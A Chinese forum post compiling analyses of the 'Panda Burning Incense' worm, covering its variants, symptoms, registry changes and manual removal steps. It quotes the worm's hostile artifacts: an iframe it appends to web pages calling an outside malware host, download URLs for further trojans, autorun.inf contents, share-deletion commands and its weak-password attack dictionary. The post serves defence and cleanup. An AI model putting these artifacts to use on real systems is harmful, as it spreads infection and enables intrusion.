相信没人会对图中的熊猫图标陌生吧，没错，这就是大名鼎鼎的熊猫感染系统文件后的壮观景象，在此寒冰收集了网上一些文章和一些查杀方法，专杀工具，希望帮助各位度过这一难关，为爱机多添一分安全。



一、熊猫历史

病毒描述：


　　“武汉男生”，俗称“熊猫烧香”，这是一个感染型的蠕虫病毒，它能感染系统中exe，com，pif，src，html，asp等文件，它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件，（.gho为GHOST的备份文件），使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。

到目前为止,从大体上分,目前主要有四大变种：

A病毒，就是FuckJacks.exe进程，
将自身复制为%System32%\FuckJacks.exe,然后感染除特殊文件夹之外的文件夹中的可执行文件。

B病毒，就是spoclsv.exe进程
将自身复制为%System32%\Drivers\spoclsv.exe,感染时在 c 盘根目录下生成感染标记文件。


C病毒
不再感染用户系统中的可执行文件，而是感染用户系统中的脚本病毒(这样的危害更大);而且在每个感染后的文件夹中写下感染标记文件。同时

对抗杀毒软件及专杀工具，杀毒公司惨遭屠戮（驱逐舰因为其超强免疫功能，所以免受其害）

D感染
最近才出现的一个变种，用户可执行文件时不再使用 A 和 B 版本中的直接捆绑感染。 用户中毒后可执行程序的图标不改变(a 和 b 版本感染

后可执行文件的图标都变成熊猫烧香)，当感染该变种会在临时目录发现100个图标文件。还有其它一些变种，基本都是为了躲避查杀进行修改

和下载不同的后门的版本。

二、中毒症状

1,感染其他应用程序的.exe文件，并改变图标颜色，但不会感染微软操作系统自身的文件

2,删除GHOST文件(.gho后缀)，网吧和学校机房深受其害

3,禁用进程管理器，禁用注册表

4,拷贝自身到所有驱动器根目录，命名为Setup.exe，并生成一个autorun.inf使得用户打开该

盘运行病毒，并将这两个文件属性设置为隐藏、只读、系统

5,修改注册表，加载自启动，并禁止显示隐藏文件

6,通过IPC$共享跨机传染，弱密码或空密码的文件服务器就要遭殃了

7、禁用杀毒工具运行


三、病毒流程分析（待补充）


根据流程图， 我们现在通过代码将病毒一层一层的解开 :





四、查杀方法



熊猫烧香病毒变种A：病毒进程为“spoclsv.exe”

　　这是“熊猫烧香”早期变种之一，特别之处是“杀死杀毒软件”，最恶劣之处在于感染全盘.exe文件和删除.gho文件（Ghost的镜像文件）。

　　最有“灵感”的一招莫过于在所有htm/html/asp/php/jsp/aspx文件末尾添加一段代码来调用病毒。目前所有专杀工具及杀毒软件均不会修复此病毒行为。需要手动清除病毒添加的代码，且一定要清除。否则访问了有此代码的网页，又会感染。其他老一点的“熊猫烧香”spoclsv变种的病毒行为比此版本少。就不再单独列出。
　　

熊猫烧香病毒详细行为：

　　1.复制自身到系统目录下：

　　%System%\drivers\spoclsv.exe（“%System%”代表Windows所在目录，比如：C:\Windows）

　　不同的spoclsv.exe变种，此目录可不同。比如12月爆发的变种目录是：C:\WINDOWS\System32\Drivers\spoclsv.exe。

　　2.创建启动项：

　　[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
　　"svcshare"="%System%\drivers\spoclsv.exe"

　　3.在各分区根目录生成病毒副本：
　　X:\setup.exe
　　X:\autorun.inf

　　autorun.inf内容：

　　[AutoRun]
　　OPEN=setup.exe
　　shellexecute=setup.exe
　　shell\Auto\command=setup.exe

　　4.使用net share命令关闭管理共享：

　　cmd.exe /c net share X$ /del /y
　　cmd.exe /c net share admin$ /del /y

　　5.修改“显示所有文件和文件夹”设置：

　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
　　\Explorer\Advanced\Folder\Hidden\SHOWALL]
　　"CheckedValue"=dword:00000000

　　6.熊猫烧香病毒尝试关闭安全软件相关窗口（略，其中最过分的竟然包含icesword，真是人怕出名猪怕壮阿，呵呵）：

　　7.尝试结束安全软件相关进程以及Viking病毒（威金病毒）进程（略，可以用熊猫杀威金哦，呵呵）：

　　8.禁用安全软件相关服务（略）：

　　9.删除安全软件相关启动项：

　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Associates Error Reporting Service
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YLive.exe
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse

　　10.遍历目录修改htm/html/asp/php/jsp/aspx等网页文件，在这些文件尾部追加信息：

　　<iframe src="hxxp://www.ctv163.com/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe>

　　但不修改以下目录中的网页文件（这些就是下文说的特殊文件夹啦，有什么重要文件资料可以寄放哦，呵呵）：

　　C:\WINDOWS
　　C:\WINNT
　　C:\system32
　　C:\Documents and Settings
　　C:\System Volume Information
　　C:\Recycled
　　Program Files\Windows NT
　　Program Files\WindowsUpdate
　　Program Files\Windows Media Player
　　Program Files\Outlook Express
　　Program Files\Internet Explorer
　　Program Files\NetMeeting
　　Program Files\Common Files
　　Program Files\ComPlus Applications
　　Program Files\Messenger
　　Program Files\InstallShield Installation Information
　　Program Files\MSN
　　Program Files\Microsoft Frontpage
　　Program Files\Movie Maker
　　Program Files\MSN Gamin Zone

　　11.在访问过的目录下生成Desktop_.ini文件，内容为当前日期。

　　12.此外，病毒还会尝试删除GHO文件。

　　病毒还尝试使用弱密码将副本以GameSetup.exe的文件名复制到局域网内其它计算机中：（略，建议还是给系统加一个复杂一点的密码吧）
　　


病毒文件内含有这些信息：

　　whboy
　　***武*汉*男*生*感*染*下*载*者***



解决方案：

　　1. 结束病毒进程：

　　%System%\drivers\spoclsv.exe

　　不同的spoclsv.exe变种，此目录可不同。比如12月爆发的变种目录是：C:\WINDOWS\System32\Drivers\spoclsv.exe。
　　
　　2. 删除病毒文件：

　　%System%\drivers\spoclsv.exe

　　请注意区分病毒和系统文件。详见步骤1。

　　3. 删除病毒启动项：

　　[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
　　"svcshare"="%System%\drivers\spoclsv.exe"

　　4. 通过分区盘符右键菜单中的“打开”进入分区根目录，删除根目录下的病毒文件：

　　X:\setup.exe
　　X:\autorun.inf

　　5. 恢复被修改的“显示所有文件和文件夹”设置：

　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
　　\Explorer\Advanced\Folder\Hidden\SHOWALL]
　　"CheckedValue"=dword:00000001

　　6. 修复或重新安装被破坏的安全软件。

　　7.修复被感染的程序。可用专杀工具进行修复，收集了四个供读者使用。金山熊猫烧香病毒专杀工具、安天熊猫烧香病毒专杀工具、江民

熊猫烧香病毒专杀工具和瑞星熊猫烧香病毒专杀工具。也可用手动方法（见本文末）。

　　8. 恢复被修改的网页文件，可以使用某些编辑网页的工具替换被添加文字为空。机器上有htm/html/asp/php/jsp/aspx等网页文件，一定要删除此段代码。有危险代码的网页一但发布到网页可能会感染其他用户。




熊猫烧香病毒变种二：病毒进程为“FuckJacks.exe” （以下是数据安全实验室提供的信息与方法http://www.dswlab.com/vir/v20061119.html）
　　

熊猫烧香病毒详细行为：

　　含有病毒体的文件被运行后，病毒将自身拷贝至系统目录，同时修改注册表将自身设置为开机启动项，并遍历各个驱动器，将自身写入磁盘根目录下，增加一个Autorun.inf文件，使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染，同时开另外一个线程连接某网站下载ddos程序进行发动恶意攻击。

　　病毒基本情况（加壳 UPX 0.89.6 - 1.02 / 1.05 - 1.24）：
　
　　1、病毒体执行后，将自身拷贝到系统目录：

　　%SystemRoot%\system32\FuckJacks.exe
　　
　　2、添加注册表启动项目确保自身在系统重启动后被加载：

　　键路径：HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
　　键名：FuckJacks
　　键值："C:WINDOWS\system32\FuckJacks.exe"

　　键路径：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
　　键名：svohost
　　键值："C:WINDOWS\system32\FuckJacks.exe"

　　3、拷贝自身到所有驱动器根目录，命名为Setup.exe，并生成一个autorun.inf使得用户打开该盘运行病毒，并将这两个文件属性设置为隐

藏、只读、系统。

　　C:autorun.inf 1KB RHS
　　C:setup.exe 230KB RHS

　　4、关闭众多杀毒软件和安全工具。

　　5、连接*****.3322.org下载某文件，并根据该文件记录的地址，去www.****.com下载某ddos程序，下载成功后执行该程序。

　　6、刷新bbs.qq.com，某QQ秀链接。

　　7、循环遍历磁盘目录，感染文件，对关键系统文件跳过，不感染Windows媒体播放器、MSN、IE 等程序。

　　Flooder.Win32.FloodBots.a.ex$ ：

　　1、病毒体执行后，将自身拷贝到系统目录：

　　%SystemRoot%\SVCH0ST.EXE（注意文件名中的“0”是数字“零”，不是字母“o”）
　　%SystemRoot%\system32\SVCH0ST.EXE（注意文件名中的“0”是数字“零”，不是字母“o”）

　　2、该病毒后下载运行后，添加注册表启动项目确保自身在系统重启动后被加载：

　　键路径：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
　　键名：Userinit
　　键值："C:WINDOWS\system32\SVCH0ST.exe"

　　3、连接ddos2.****.com，获取攻击地址列表和攻击配置，并根据配置文件，进行相应的攻击。

　　配置文件如下：

　　www。victim.net:3389
　　www。victim.net:80
　　www。victim.com:80
　　www。victim.net:80
　　1
　　1
　　120
　　50000　

病毒文件内含有这些信息：

　　whboy
　　***武*汉*男*生*感*染*下*载*者***

　

解决方案：

　　1. 断开网络

　　2. 结束病毒进程：%System%\FuckJacks.exe

　　3. 删除病毒文件：%System%\FuckJacks.exe

　　4. 右键点击分区盘符，点击右键菜单中的“打开”进入分区根目录，删除根目录下的文件：

　　X:\autorun.inf
　　X:\setup.exe

　　5. 删除病毒创建的启动项：

　　[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
　　"FuckJacks"="%System%\FuckJacks.exe"

　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
　　"svohost"="%System%\FuckJacks.exe"

　　6. 修复或重新安装反病毒软件

　　7. 使用反病毒软件或专杀工具进行全盘扫描，清除恢复被感染的exe文件。也可用以下的手动方法恢复文件。


　　



熊猫烧香病毒变种三：病毒进程为“spoclsv.exe”
（转载自LoveBoom的分析，在此表示感谢http://bbs.pediy.com//showthread.php?threadid=38051）


熊猫烧香病毒详细行为：

病毒不再感染用户系统中的可执行文件，而是感染用户系统中的脚本病毒(这样的危害更大);而且在每个感染后的文件夹中写下感染标记文件。同时对抗杀毒软件及专杀工具，杀毒公司惨遭屠戮（驱逐舰因为其超强免疫功能，所以免受其害）

其他略

病毒文件内含有这些信息：

***武*汉*男*生*感*染*下*载*者***"
"感谢艾玛,mopery 对此木马的关注!~"


代码分析节选：

第一步骤：
复制病毒至特定文件夹下
如果是感染后文件则释放病毒原体和感染前文件,然后运行感染前文件
清除反病毒软件和下载其它病毒


下面看看病毒复制自身至特定文件夹下，以及运行感染后程序时的处理:

设置病毒同路径下的desktop_.ini 文件属性为 normal
删除 Desktop_ini 文件
将病毒文件读取至内存中
判断文件尾最后一位是否为0，如果不为 0 则跳过
如果感染标记不为 0， 则跳去下一步
将路径转为大写
判断病毒当前路径是否为：%SysDir%\drivers\spoclsv.exe，如果病毒全路径不为%SysDir%\drivers\spoclsv.exe，则终止进程中的病毒进程，复制病毒至以上目录中，然后执行病毒程序。


这部分病毒做了什么?病毒做了以下操作:
病毒首先判断是否为病毒体，不是病毒体则释放出病毒体和感染前文件。
如果是病毒体则判断是否在 Drivers 目录下运行，不是则终止系统进程中的病毒，然后将
自身替换 Drivers 目录下以已有的病毒体(估计是用于病毒本身的更新)。然后重写
Desktop_.ini 文件。



接下来，我们继续看看感染部分，这部分算是病毒的"核心"部分吧，因为如果没有这部分这
病毒只能算是个木马下载器:)。感染部分病毒分以下以几部分:


获取有效的分区
判断是否为 a 或 b 分区，如果是则不进行感染
查找目录中的所有文件
比较是否为特殊文件夹（见下文注解），如果是则不进行感染
不是特殊文件夹则跳来这里
如果 desktop_.ini 文件不存在则
如果文件内的内容等于当前日期，则病毒认为该文件夹已经感染过， "感染过,跳过!"，写入c:\\test.txt，文件内容不为当前日期时病毒重写

该文件内容为当前日期
Desktop_.ini 没有找到,建立一个
如果是文件名为"."则跳去查找下一个文件
获取程序扩展名，如果是后缀名为 GHO 则删除该文件
如果文件大于 10mb 则不进行感染操作
文件名为 setup.exe 则跳去查找下一个文件
感染脚本文件


到这里感染本地文件部分就结束了，总的来说详细感染部分是这样做的:

搜索机器上的可用分区，然后感染分区中所有的脚本文件(脚本文件类型在概要中已说明).
但是病毒不感染以下文件夹:
WINDOWS
WINNT
system32
Documents and Settings
System V olumeInformation
Recycled
Windows NT
WindowsUpdate
Windows Media Player
Outlook Express
Internet Explorer
NetMeeting
Common Files
ComPlus Applications
Messenger
InstallShield Installation Information
MSN
Microsoft Frontpage
Movie Maker
MSN Gamin Zone

感染后病毒在相应的文件夹中写上已感染标记文件 Desktop_.ini。再者病毒会删除机器中名
缀名为 GHO 的文件，使得中毒后无法使用 ghost 还原系统。
CTimer_WITE_AUTORUNINF部分,这部分很简单的，只是简单的将病毒自身复制
到各分区根目录下命名为 setup.exe,并生成 autorun.inf 文件。


下面进入 Infect_NetW ork部分， 跟进入好几层才出现关键代码， 这部分就是病毒进行局域网
感染部分(这部分存在一定的危害，因此我不贴详细的分析代码):

病毒遍历用户所在的局域网，连接上可用机器时病毒将自身复制到目标机器的以下位置(因
系统而异):
\Documents and Settings\All Users\Start Menu\Programs\Startup\
\Documents and Settings\All Users\「开始」菜单\程序\启动\
\WINDOWS\Start Menu\Programs\Startup\
\WINNT\Profiles\All Users\Start Menu\Programs\Startup\
病毒病毒名为 GameSetup.exe，然后添加远程任务，同时病毒会尝试对内网中的机器进行弱
口令攻击,病毒攻击字典如下:
1234、password、6969、harley、123456、golf、pussy、mustang、1111、shadow、1313、fish、5150、
7777、qwerty、baseball、2112、letmein、12345678、12345、ccc、admin、5201314、qq520、
１、 １２、123、1234567、123456789、654321、54321、111、000000、abc、pw、1111111、88888888、
pass、passwd、database、abcd、abc123、sybase、123qwe、server、computer、520、super、
123asd、ihavenopass、godblessyou、enable、xp、2002、2003、2600、alpha、110、111111、
121212、123123、1234qwer、123abc、007、a、aaa、patrick、pat、administrator、root、sex、god、fuckyou、fuck、test、test123、

temp、temp123、win、pc、asdf、pwd、qwer、yxcv、zxcv、home、
xxx、owner、login、Login、pw123、love、mypc、mypc123、admin123、mypass、mypass123、901100、
Administrator、Guest、admin、Root
看到上面一堆的弱口令， 我相信肯定有人的密码在以上列表中。 弱口令攻击成功后病毒就对
目标机器进行病毒感染形为。


到这里为此病毒所有的感染模块都讲完了。下面讲讲接下来的下载和清除反病毒软件部分:

写入注册表自启动项:
这部分主要是病毒写入注册表自启动项使病毒开机后会自动运行,写入项如下:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentV ersion\Run
"svcshare" = "%Sysdir%\drivers\spoclsv.exe
然后病毒修改以下注册表项使用户无法显示隐藏文件:
HKLM\SOFTW ARE\Microsoft\Windows\CurrentV ersion\Explorer\Advanced
Folder\Hidden\SHOW ALL\CheckedV alue


病毒还做了以下清除反病毒软件操作:
终止窗体名包含以下字符串的相应进程:(略)
病毒通过枚举系统进程列表，终止以下相关进程:（略）



接下来，看看病毒下载其它病毒部分:

这里病毒通过网络连接 http://xww.ctv163.com/wuhan/down.txt这个地址， 然后解释出该地址
中所下载的其它木马地址,然后下载并运行相应的木马程序，今天我试了下，病毒下载的木
马地址为:http://www.chinanet123.cn/Class/about/image/images.jpg/2007qq.exe(感谢小崽娃帮
忙下载此文件，下载后大概看了下是个ＱＱ木马程序)。


病毒运行后会关闭已中毒机器上的默认共享
当然你别以为他是做什么好事，只是为了避免
病毒自已在局域内做重复工作而已。
病毒关闭了以下默认共享:
cmd.exe /c net share 驱动器名$ /del /y
cmd.exe /c net share admin$ /del /y
(这次少了 A 版本中的删除ＩＰＣ$连接） 。


最后直接删除相关反病毒软件的服务。使中毒后杀毒软件无法正常工作。


解决方案：

1、关闭网络共享，或者断开网络。
2、使用 process Explorer 将 spoclsv.exe进程终止，然后将机器上的所有 desktop_.ini 文件删除。
3、使用 msconfig 之类的工具将 svcshare 项删除。
4、删除每个盘下的 autorun.inf 文件和 setup.exe 文件。
5、关闭系统的自动播放功能。
6、删除 Drivers 目录下的 spoclsv.exe文件。
7、使用 ultraedit 之类的工具将所有脚本文件的中的病毒代码清除。
8、清除完毕后，将登录密码设置复杂些，然后重启系统打全系统补丁。
9、对于这个版本，还得更新 QQ 补丁(因为这个版本有利用 QQ 漏洞进行传播)。



写在最后的话: 这个病毒其实传播最主要的途径是通过挂马、漏洞方式进行传播。如果你的系统安全补丁比较全，不随便下软件什么的中毒机率是比较低的，同时，提醒一句：做完以上步骤后，重启电脑，熊猫烧香病毒原本就手工处理了，但本机被感染的文件还在，这时候一般的安全软件已经可以使用了，但是在用杀毒软件全盘扫描前，千万不要执行本机的其他应用程序或.exe文件，切记，切记





附：手动恢复中毒文件（在虚拟机上通过测试，供参考）

　　1.在清除病毒文件的同时不删除%SYSTEM%下面释放FuckJacks.exe的这个文件，即执行之前的步骤1、2、4、5。

　　2.打开“运行”输入“gpedit.msc”打开组策略－本地计算机策略－windows设置－安全设置－软件限制策略－其它规则。在其它规则上右

键选择－新散列规则－打开新散列规则窗口

　　3.在文件散列上点击浏览找到%SYSTEM%下面释放FuckJacks.exe文件。安全级别选择－不允许的。确定后重启。

　　4.重启后可以双击运行已经被熊猫感染的程序。运行程序后该FuckJacks.exe文件会在注册表里的Run键下建立启动项（不会有问题的）。

　　5.双击运行被感染的程序已经恢复原来样子了。全部回复后，用SREng把FuckJacks.exe在注册表里的启动项删除即可！




四、专杀工具


由于雨林上传附件的限制，专杀工具集合的去我的网盘，已经打包了，包括巡警的，民间版本的，农夫版本和各大杀软的，喜欢就去，在专杀工具目录下（还有很多不错的小软件哦，呵呵）
http://readon99.edudisk.cn/

占楼

占楼

占楼

占楼